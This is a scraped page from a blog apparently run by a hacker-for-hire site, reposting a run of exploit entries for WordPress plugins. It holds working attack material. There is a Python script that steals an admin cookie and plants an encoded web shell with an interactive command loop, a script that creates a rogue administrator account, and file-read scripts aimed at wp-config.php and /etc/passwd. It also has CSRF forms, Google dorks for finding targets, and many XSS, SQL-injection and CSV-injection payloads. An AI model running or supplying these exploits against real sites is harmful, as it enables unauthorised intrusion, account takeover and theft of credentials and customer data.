Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863131848

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
# Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/=")
# Date: 2020-12-12
# Exploit Author: Wadeek
# Vendor Homepage: https://www.boldgrid.com/
# Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip
# Version: 1.14.9
# Tested on: BackBox Linux

1) 'readme.txt' file reveal the plugin version :
-> GET /wp-content/plugins/boldgrid-backup/readme.txt
Stable tag: 1.14.9

2) 'env-info.php' file reveals the following informations without authentication :
-> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php
{
    [...],
    "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x=
86_64",
    "php_version":"7.X.X",
    "server_addr":"127.0.0.1",
    "server_name":"www.example.com",
    "server_protocol":"HTTP/1.1",
    "server_software":"Apache/2.X.XX (Ubuntu)",
    "uid":XX,
    "username":"www-data"
}

3) 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication :
-> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json
{
    [...]
    "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
    [...]
}
--trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--
HireHackking 
source: https://www.securityfocus.com/bid/55664/info

The Token Manager plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Token Manager 1.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=tokenmanageredit&tid=<script>alert(document.cookie);</script>
http://www.example.com/wp-admin/admin.php?page=tokenmanagertypeedit&tid=<script>alert(document.cookie);</script>
HireHackking 
# Exploit Title: Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass
# Date: 2020-01-16
# Exploit Author: B. Canavate 
# Vendor Homepage: https://wptimecapsule.com/
# Software Link: https://wptimecapsule.com/
# Version:  Wordpress Time Capsule Plugin < 1.21.16
# Tested on: LAMP stack with most recent Wordpress



---- code below ----


# PoC by: B. Canavate 
# Based on the research done by the fine people at: https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
# GitHub repo with breakdown: https://github.com/SECFORCE/WPTimeCapsulePOC


import requests
import sys


if len(sys.argv) == 1:
	print "Usage:  poc.py http://127.0.0.1/ - Get Admin cookie"
	print " poc.py http://127.0.0.1/ shell - Get Admin Cookie + Upload a shell on /wp-content/plugins/shell/shell.php "
	print " Shell usage: /shell.php?pass=mak3ithapp3n&cmd=COMMAND"
else:
	url = sys.argv[1]
	session = requests.Session()
	rawBody = "IWP_JSON_PREFIX"
	headers = {"Referer":url}
	response = session.post(url, data=rawBody, headers=headers, verify=False)
	for cookie in response.cookies:
		if "logged" in cookie.name:
			cookieadmin = cookie
	response2 = session.get(url+"wp-admin/index.php", headers=headers, cookies = response.cookies, verify=False)
	if "Dashboard" in response2.content:
		print "This is the cookie that  you are looking for :-)"
		print cookieadmin.name+":"+cookieadmin.value

		if len(sys.argv) == 3 and sys.argv[2] == "shell":
			response = session.get(url+"/wp-content/plugins/shell/shell.php?pass=mak3ithapp3n&cmd=",verify=False)
			if response.status_code != 200 :
				paramsGet = {"action":"upload-plugin"}
				paramsPost = {"_wpnonce":"1ef2140910","_wp_http_referer":"/wp-admin/plugin-install.php","install-plugin-submit":"Install Now"}
				paramsMultipart = [('pluginzip', ('shell.zip', "PK\x03\x04\x14\x03\x00\x00\x08\x00ra0P\xf2\x0f\x1d\xad\xe2\x00\x00\x00j\x01\x00\x00\x09\x00\x00\x00shell.php\x85\x8d1O\xc30\x10\x85\xe7\xfaW\x9c\xaa\xaaM:4\xa0n\x86P\xa1\x10\x24\x18\xa0\x24\x94\x05!d\xdc\x0b\xb6\x88c+\xe7\x0c\x15\xea\x7f\xc7\xc9\x80\xaav\xe8-\xa7\xbb\xf7\xbd\xf7\xaeWN9\x06a\x92\xf9\xb0\xd6u\xf7\xad\x1bx\x12\x069\x94yv\xff\\d9\xacm\x06\xa5\xc2\xba>d6\xc5\x03\x07\xe5\xbd\x23\x9e\x24\x84\xb2\xb2\xad\xc4\x85\xb4f\x80\xee\x90d\xab\x9d\xd7\xb6\xe1\xf0\xd8\x91\x07\x01(h\x07\xf4\x9fs\xdbye[\x0e_\xc1\xa8\x86\xcf\x1b\xb64\x18.\x16\x97\x07\xc8\x99\xaay\xc2\x180\xd0U\xa4\x89\xd0G\x93\xcf\"\x7f\xd9\xe4\xe5\xeb\xfbL\x9a\xed\xec\x23\x86\xe9\x14N\x24'\x88\x82\x16\xff\xb2\x91\xae\xe0T\x814\x85\xb1\x11?K\xed\x95pn\xd9\x8c{t4\x09\x91\x90\xc2q\xc7U\x90hG\x1eM\xd4\x13q\x7fo5\x86\xb5g{\xb6\xbaa\x7fPK\x01\x02?\x03\x14\x03\x00\x00\x08\x00ra0P\xf2\x0f\x1d\xad\xe2\x00\x00\x00j\x01\x00\x00\x09\x00\x24\x00\x00\x00\x00\x00\x00\x00 \x80\xb4\x81\x00\x00\x00\x00shell.php\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00LE\x19f\xcc\xd5\x01\x00LE\x19f\xcc\xd5\x01\x00LE\x19f\xcc\xd5\x01PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00[\x00\x00\x00\x09\x01\x00\x00\x00\x00", 'application/zip'))]
				headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0","Referer":url+"/wp-admin/plugin-install.php","Connection":"close","Accept-Encoding":"gzip, deflate","DNT":"1","Accept-Language":"en-GB,en;q=0.5"}
				cookies = {"wordpress_test_cookie":"WP+Cookie+check","wordpress_5c016e8f0f95f039102cbe8366c5c7f3":"secforce%7C1579345389%7CVEj3PYaEDRwiYHj9dvd3H2813BfDsqNxAJQyF0N4nOa%7Ccd8ab0bf244d404dc2b3ec55335545553a8017c254357f76b061345dfa751545","wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3":"secforce%7C1579345389%7CfoMJPKzwmHvHzKkdwvUcxUIXU327HQWR6Lrv1oP6qzA%7C2531f7ca8075fd9e0a56293dd7a627b2de1ddfe49ff34be9f0835e2a5e4cccb4","wp-settings-time-1":"1579176444"}
				response = session.post(url+"/wp-admin/update.php", data=paramsPost, files=paramsMultipart, params=paramsGet, headers=headers, cookies=cookies)
			print ("Now you have a shell! ")
			command = ""
			while(1 and (command != "exit")):
				command = str(raw_input())
				response = session.get(url+"/wp-content/plugins/shell/shell.php?pass=mak3ithapp3n&cmd="+command, verify=False)
				print(response.content)
			print "Remember to delete the shell.php :-)"
	else:
		print "There was an error :("
HireHackking 
source: https://www.securityfocus.com/bid/51216/info

The TheCartPress WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

TheCartPress WordPress Plugin 1.6 and prior versions are vulnerable.

http://www.example.com/wp-content/plugins/thecartpress/admin/OptionsPostsList.php?tcp_options_posts_update=sdf&tcp_name_post_234=%3Cimg%20src=[XSS]&tcp_post_ids[]=234
HireHackking 
# Exploit Title: Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/wp-content/plugins/thecartpress/
# Date: 04/10/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugin/thecartpress
# Version: <= 1.5.3.6
# Tested on: Ubuntu 20.04.1

import os.path
from os import path
import json
import requests;
import sys

def print_banner():
	print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation")
	print("Author -> space_hen (www.github.com/spacehen)")
	
def print_usage():
	print("Usage: python3 exploit.py [target url]")
	print("Ex: python3 exploit.py https://example.com")

def vuln_check(uri):
	response = requests.get(uri)
	raw = response.text
	if ("User name is required" in raw):
		return True;
	else:
		return False;

def main():

	print_banner()
	if(len(sys.argv) != 2):
		print_usage();
		sys.exit(1);

	base = sys.argv[1]

	ajax_action = 'tcp_register_and_login_ajax'
	admin = '/wp-admin/admin-ajax.php';

	uri = base + admin + '?action=' + ajax_action ;
	check = vuln_check(uri);

	if(check == False):
		print("(*) Target not vulnerable!");
		sys.exit(1)

	data = {
	"tcp_new_user_name" : "admin_02",
	"tcp_new_user_pass" : "admin1234",
	"tcp_repeat_user_pass" : "admin1234",
	"tcp_new_user_email" : "test@test.com",
	"tcp_role" : "administrator"
	}
	print("Inserting admin...");
	response = requests.post(uri, data=data )
	if (response.text == "\"\""):
		print("Success!")
		print("Now login at /wp-admin/")
	else:
		print(response.text)

main();
HireHackking 
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
#     *----------------------------*      #
#  K  |....##...##..####...####....|  .   #
#  h  |....#...#........#..#...#...|  A   #
#  a  |....#..#.........#..#....#..|  N   #
#  l  |....###........##...#.....#.|  S   #
#  E  |....#.#..........#..#....#..|  e   #
#  D  |....#..#.........#..#...#...|  u   #
#  .  |....##..##...####...####....|  r   #
#     *----------------------------*      #
#-----------------------------------------#
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
#-----------------------------------------#
###########################################
# >>    D_x . Made In Algeria . x_Z    << #
###########################################
#
# [>] Title : Wordpress Plugin TheCartPress v1.4.7 Multiple Vulnerabilities
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : Multiple
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://thecartpress.com
#
###########################################
#
# [!] Description :
#
# Wordpress plugin TheCartPress v1.4.7 is suffer from multiple vulnerabilities
# remote attacker can disclosure some local files or do a remote code execution.
#
####

// page : Miranda.class.php
// lines : 111.. 115

/* --[1] Local File Include -- */
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/thecartpress/modules/Miranda.class.php?page=../../../../../../../../wp-config.php%00");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

/* --[2] Remote Code Execution -- */
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp/admin-ajax.php?action=tcp_miranda_save_admin_panel&class=[RCE]");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

####
#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , 
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & 
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####
HireHackking 
Advisory ID: HTB23254
Product: TheCartPress WordPress plugin
Vendor: TheCartPress team
Vulnerable Version(s): 1.3.9 and probably prior
Tested Version: 1.3.9
Advisory Publication:  April 8, 2015  [without technical details]
Vendor Notification: April 8, 2015 
Public Disclosure: April 29, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79], Improper Access Control [CWE-284]
CVE References: CVE-2015-3301, CVE-2015-3300, CVE-2015-3302
Risk Level: High 
CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in TheCartPress WordPress plugin, which can be exploited to execute arbitrary PHP code, disclose sensitive data, and perform Cross-Site Scripting attacks against users of WordPress installations with the vulnerable plugin.

1) Local PHP File Inclusion in TheCartPress WordPress plugin: CVE-2015-3301

Input passed via the "tcp_box_path" HTTP POST parameter passed to "/wp-admin/admin.php?page=checkout_editor_settings" URL is not properly verified before being used in PHP 'include()' function, and can be abused to include arbitrary local files via directory traversal sequences.

In order to successfully exploit the vulnerability an attacker needs to have administrator privileges on WordPress installation, however this can be also exploited via CSRF vector to which the script is vulnerable as well. 

Simple CSRF exploit below will execute the content of '/etc/passwd' file when a logged-in administrator will visit a page with it:

<form action="http://wordpress/wp-admin/admin.php?page=checkout_editor_settings" method="post" name="main">
<input type="hidden" name="tcp_save_fields"  value='1'>
<input type="hidden" name="tcp_box_path"  value='../../../../../etc/passwd'>
<input type="submit" id="btn">
</form>
<script>
 document.main.submit();
</script>



2) Stored XSS in TheCartPress WordPress plugin: CVE-2015-3300

During the checkout process, many user-supplied HTTP POST parameters (see complete list in PoC)in "Shipping address" and "Billing address" sections are not being sanitized before being stored in the local database. 

Simple mass-XSS PoC against "Billing address" section (PoC against "Shipping address" scetion is identical, just replace 'billing_' prefix with 'shipping_') will write several JS pop-up alerts into the application database:

<form action="http://wordpress/shopping-cart/checkout/" method="post" name="main">
<input type="hidden" name="selected_billing_id"  value='1'>
<input type="hidden" name="selected_billing_address"  value='new'>
<input type="hidden" name="billing_firstname"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_lastname"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_company"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_tax_id_number"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_country_id"  value='AF'>
<input type="hidden" name="billing_region_id"  value=''>
<input type="hidden" name="billing_region"  value=''>
<input type="hidden" name="billing_city"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_street"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_street_2"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_postcode"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_telephone_1"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_telephone_2"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_fax"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_email"  value='mail@mail.com'>
<input type="hidden" name="tcp_continue"  value=''>
<input type="hidden" name="tcp_step"  value='1'>
<input type="submit" id="btn">
</form>


A non-authenticated attacker may inject malicious HTML and JS code that will be stored in the application database, and available to any non-authenticated user on the following URL:

http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order

As well as on the following URL accessible to WordPress administrator only:

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/OrdersListTable.php


3) Improper Access Control in TheCartPress WordPress plugin: CVE-2015-3302

Any non-authenticated user may browse orders of other users due to broken authentication mechanism. To reproduce the vulnerability an attacker shall first open the following URL:
http://wordpress/shopping-cart/checkout/?tcp_checkout=ok&order_id=[order_id]

And just after open the following URL to see full order details:
http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order

Moreover, the order ID can be easily predicted, as every new order ID is an incremented value of the previous one. This enables non-authenticated remote attacker to steal all currently-existing orders.


4) Multiple XSS in TheCartPress WordPress plugin (against administrator only): CVE-2015-3300

4.1 Input passed via the "search_by" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php&search_by=--%3E%%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

4.2 Input passed via the "address_id", "address_name", "firstname", "lastname", "street", "city", "postcode", "email" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_name=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&firstname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&lastname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&street=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&city=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&postcode=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&email=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

4.3 Input passed via the "post_id" and "rel_type" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=1&rel_type=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

4.4 Input passed via the "post_type" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php&post_type=1--%3E%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

-----------------------------------------------------------------------------------------------

Solution:

2015-04-08 Vendor Alerted via emails.
2015-04-17 Vendor Alerted via contact form and emails.
2015-04-17 Vendor Alerted via WordPress Support Forums.
2015-04-27 Fix Requested via emails.
2015-04-29 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.
According to the vendor the plugin will not be supported anymore since 1st of June 2015: http://thecartpress.com/extend/important-note-nota-importante/

We recommend disabling or removing the vulnerable plugin as a workaround.

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23254 - https://www.htbridge.com/advisory/HTB23254 - Multiple vulnerabilities in TheCartPress Wordpress plugin.
[2] TheCartPress Wordpress plugin- http://thecartpress.com/ - Professional WordPress eCommerce Plugin. Use it as Shopping Cart, Catalog or Framework.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
HireHackking 
source: https://www.securityfocus.com/bid/51037/info

The Welcomizer plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

The Welcomizer 1.3.9.4 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/wp-content/plugins/the-welcomizer/twiz-index.php?page=[xss]
HireHackking 
# Exploit Title: WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)
# Date: 23/12/2021
# Exploit Authors: Nicole Sheinin, Liad Levy
# Vendor Homepage: https://wordpress.org/plugins/seo-local-rank/
# Software Link: https://plugins.svn.wordpress.org/seo-local-rank/tags/2.2.2/
# Version: versions <= 2.2.2
# Tested on: MacOS 
# CVE: CVE-2021-39312
# Github repo: 

#!/usr/bin/env python3

import argparse, textwrap
import requests
import sys

parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter)                     
group_must = parser.add_argument_group('must arguments')
group_must.add_argument("-u","--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)",required=True) 
parser.add_argument("-p","--payload", help="Path to read  [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php",required=False) 

args = parser.parse_args()

if len(sys.argv) <= 2:
    print (f"Exploit Usage: ./exploit.py -h [help] -u [url]")          
    sys.exit()  

HOST = args.url
PAYLOAD = args.payload

url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST)
payload = "/scripts/simple.php/{}".format(PAYLOAD)


r = requests.post(url,data={'src': payload})
if r.status_code == 200:
  print(r.text)
else:
  print("No exploit found")
HireHackking 
# Exploit Title: WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS)
# Date: 05/08/2022
# Exploit Author: saitamang , yunaranyancat , syad
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/plugins/testimonial-slider-and-showcase/
# Version: 2.2.6
# Tested on: Centos 7 apache2 + MySQL

WordPress Plugin "Testimonial Slider and Showcase" is prone to a cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Testimonial Slider and Showcase" version 2.2.6 is vulnerable; prior versions may also be affected.

Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post

payload --> test"/><img/src=""/onerror=alert(document.cookie)>

The draft post can be viewed using the Editor account or Admin account and XSS will be triggered once clicked.
HireHackking 
source: https://www.securityfocus.com/bid/58415/info

The Terillion Reviews plugin for WordPress is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. 

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
HireHackking 
source: https://www.securityfocus.com/bid/68662/info
 
Tera Charts plugin for WordPress is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker can exploit these issues to obtain potentially sensitive information; other attacks are also possible.
 
Tera Charts 0.1 is vulnerable; other versions may also be affected. 

http://www.example.com/wp_test/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd
HireHackking 
source: https://www.securityfocus.com/bid/68662/info

Tera Charts plugin for WordPress is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to obtain potentially sensitive information; other attacks are also possible.

Tera Charts 0.1 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress_vuln_check/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../../etc/passwd
http://www.example.com/wordpress_vuln_check/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../../etc/passwd
HireHackking 
# Exploit Title: WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 23-10-2021
# Exploit Author: Akash Rajendra Patil
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/simple-tags/
# Tested on Windows
# CVE: CVE-2021-24444
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24444
# Reference: https://wpscan.com/vulnerability/a31321fe-adc6-4480-a220-35aedca52b8b


How to reproduce vulnerability:

1. Install Latest WordPress

2. Install and activate TaxoPress Version 3.0.7.1
3. Navigate to Add Table >> add the payload into 'Table Name & Descriptions'
and enter the data into the user input field.

4. Enter JavaScript payload which is mentioned below
"><img src=x onerror=confirm(docment.domain)>

5. You will observe that the payload successfully got stored into the
database and when you are triggering the same functionality in that
time JavaScript payload is executing successfully and we are getting a
pop-up.
HireHackking 
# Exploit Title: WordPress Plugin Tagregator 0.6 - Cross-Site Scripting
# Date: 2018-05-05
# Exploit Author: ManhNho
# Vendor Homepage: https://wordpress.org/plugins/tagregator/
# Software Link: https://downloads.wordpress.org/plugin/tagregator.0.6.zip
# Ref: https://pastebin.com/ZGr5tyP2
# Version: 0.6
# Tested on: CentOS 6.5
# CVE : CVE-2018-10752
# Category : Webapps

# 1. Description
# WordPress Plugin Tagregator 0.6 - Stored XSS

# 2. Proof of Concept

1. Login to admin panel
2. Access to Wordpress Tagregator setting, then choose Tweets/Instagram
Media/Flickr Post/Google+ Activities and click "Add New" button
3. In title field, inject XSS pattern such as:
    <script>alert('xss')</script> and click Preview button
4. This site will response url that will alert popup named xss
5. Send this xss url to another administrators, we have same alert
HireHackking 
source: https://www.securityfocus.com/bid/56569/info

The Tagged Albums plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/wp-content/plugins/taggedalbums/image.php?id=[sql]
HireHackking 
source: https://www.securityfocus.com/bid/52908/info

TagGator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Update Apr 9, 2012: The vendor disputes this issue stating the issue can not be exploited as described, as the reported parameter does not exist.

http://www.example.com/wp-content/plugins/taggator/taggator.php?tagid=[Sql]
HireHackking 
# Exploit Title: WordPress Plugin TablePress 1.14 - CSV Injection 
# Date: 07/09/2021
# Exploit Author: Nikhil Kapoor
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/tablepress/
# Version: 1.14
# Category: Web Application
# Tested on Windows

How to Reproduce this Vulnerability:

1. Install WordPress 5.8.0
2. Install and activate TablePress
3. Navigate to TablePress >> Add New >> Enter Table Name and Description (If You want this is Optional) >> Select Number of Rows and Columns
4. Click on Add Table
5. Now in Table Content Input Field Enter CSV Injection Payload
6. Click on Save Changes
6. Now go to All Table in TablePress select our entered table >> Click on Export >> Select CSV as an Export Format.
7. Click on Download Export File
8. Open the exported CSV file you will see that CSV Injection got Successfully Executed.

Payload Used :- @SUM(1+9)*cmd|' /C calc'!A0
HireHackking 
# Exploit Title: WP Symposium 14.10 SQL Injection
# Date: 22-10-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
# Software Link: https://downloads.wordpress.org/plugin/wp-symposium.14.10.zip
# Category: webapps
# CVE: CVE-2014-8810
  
1. Description
  
$_POST['tray'] is not escaped.

File: wp-symposium\ajax\mail_functions.php
$tray = $_POST['tray'];
$unread = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->base_prefix.'symposium_mail'." WHERE mail_from = ".$mail->mail_from." AND mail_".$tray."_deleted != 'on' AND mail_read != 'on'");

http://security.szurek.pl/wp-symposium-1410-multiple-xss-and-sql-injection.html
  
2. Proof of Concept

